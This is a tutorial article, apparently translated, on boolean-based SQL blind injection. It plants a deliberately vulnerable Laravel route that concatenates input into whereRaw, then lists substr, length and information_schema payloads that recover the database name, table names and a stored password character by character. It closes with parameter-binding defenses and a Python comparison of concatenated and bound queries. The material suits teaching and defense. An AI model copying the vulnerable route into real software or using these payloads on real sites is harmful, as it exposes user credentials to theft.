This article covers Laravel-related knowledge: it explains the principle of SQL blind injection by deliberately creating a vulnerable Laravel route. "Blind" injection means the server returns no error message; the attacker can only infer results from whether the page displays content or not. Let's walk through an injection completed purely through that display difference. I hope it will be helpful to everyone.

Environment

```text
composer create-project laravel/laravel lar9
DEBUG=false
DB_HOST=....
php artisan migrate
php artisan serve
insert into users(`name`,`email`,`password`) values('xxh','4******qq.com','worldhello');
```
Create vulnerability

```php
Route::get('/', function () {
    $id = request()->id;
    // Deliberately vulnerable: user input is concatenated straight into the SQL text.
    $user = \App\Models\User::whereRaw('id = ' . $id)->first();
    return $user->name ?? '';
});
```
Test
Steps
Database name
Guess the length of the database name
```sql
-- url: http:
select * from users where id = 1 and length(database()) = 1;
select * from users where id = 1 and length(database()) = 2;
```
Guess the database name

```sql
-- From the first step we know the length of the database name
select * from users where id = 1 and substr(database(),1,1) = 'a';
select * from users where id = 1 and substr(database(),1,1) = 'b';
```

Finally: laravel_project
Table name
The following steps are almost the same as guessing the database name, so I will only cover them briefly.
information_schema
information_schema comes with MySQL.
It records database names, table names, column types and so on; guessing table and column names means reading from this database.
Guess the number of tables in laravel_project

```text
url: http:
mysql> select count(*) from information_schema.tables where table_schema = "laravel_project";
+----------+
| count(*) |
+----------+
|        5 |
+----------+
```
Guess the length of the first table name
Same as guessing the length of the database name; there is nothing more to add.
Guess the first table name

```text
url: http:
mysql> select substr(table_name,1,1) from information_schema.tables where table_schema = "laravel_project" limit 0,1;
+------------------------+
| substr(table_name,1,1) |
+------------------------+
| f                      |
+------------------------+
```
Finally the first table name is: failed_jobs
Guess the fields
The same logic as guessing the table.

```sql
select count(column_name) from information_schema.columns where table_name = 'failed_jobs';
```
Guess the data
The data is what matters most.
Because failed_jobs has no rows, I switched to users.
users has a password field.
```text
mysql> select substr((select password from users limit 0,1),1,1);
+----------------------------------------------------+
| substr((select password from users limit 0,1),1,1) |
+----------------------------------------------------+
| w                                                  |
+----------------------------------------------------+
The first character is w; store it and check at the end
mysql> select substr((select password from users limit 0,1),1,2);
+----------------------------------------------------+
| substr((select password from users limit 0,1),1,2) |
+----------------------------------------------------+
| wo                                                 |
+----------------------------------------------------+
The second character is o
Use the first value + the second value as the blind-injection guess
```
......
Defense
(Sometimes where() does not meet the need and you have to use whereRaw.)
If you must use it, remember to bind the parameters.
```php
Route::get('/', function () {
    $id = request()->id;
    // Parameter binding: the input is sent as a value, never as SQL text.
    $user = \App\Models\User::whereRaw('id = ?', [$id])->first();
    return $user->name ?? '';
});
```
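To make the difference concrete, here is an added example (not from the original article) that mirrors the two routes against an in-memory SQLite table with constructed sample data. The concatenated query answers a true and a false condition differently (the display-based oracle the article relies on), while the bound query gives the same answer for both because the whole input is treated as one literal value.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the article's users table; sample values only.
    con = sqlite3.connect(":memory:")
    con.execute("create table users (id integer primary key, name text, email text, password text)")
    con.execute("insert into users(name, email, password) values ('xxh', 'user@example.com', 'worldhello')")
    return con

def lookup_concat(con, user_input):
    """Mirrors whereRaw('id = ' . $id): the input becomes part of the SQL text."""
    row = con.execute("select name from users where id = " + user_input).fetchone()
    return row[0] if row else ""

def lookup_bound(con, user_input):
    """Mirrors whereRaw('id = ?', [$id]): the input is passed as a single parameter."""
    row = con.execute("select name from users where id = ?", (user_input,)).fetchone()
    return row[0] if row else ""

# Two inputs in the article's style: one true condition, one false condition.
TRUE_COND = "1 and substr((select password from users limit 1),1,1) = 'w'"
FALSE_COND = "1 and substr((select password from users limit 1),1,1) = 'z'"

def oracle_leaks(lookup):
    """True when the response differs between the true and the false condition,
    i.e. when the page can be used as a blind-injection oracle."""
    con = make_db()
    return lookup(con, TRUE_COND) != lookup(con, FALSE_COND)

if __name__ == "__main__":
    print("concatenated query leaks:", oracle_leaks(lookup_concat))  # True
    print("bound query leaks:", oracle_leaks(lookup_bound))          # False
```

With the bound version a MySQL backend may coerce the string to the number 1 and return the same row for both inputs; the outcome is still identical for true and false, so no information leaks.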
As long as you use the framework safely, there will be no such loopholes.
Old projects are full of them.
In this era, it is hard to find such loopholes.
Ps
For simplicity, the simplest (linear) search was used above.
Manual blind injection should use binary search.

```sql
select * from users where id = 1 and substr(database(),1,1) = 'a';
-- switched to binary search:
select * from users where id = 1 and ascii(substr(database(),1,1)) > 99;
```
It is best to use the tool sqlmap to scan it out directly.
The above is the detailed content of Parsing SQL blind injection principles through laravel vulnerability examples.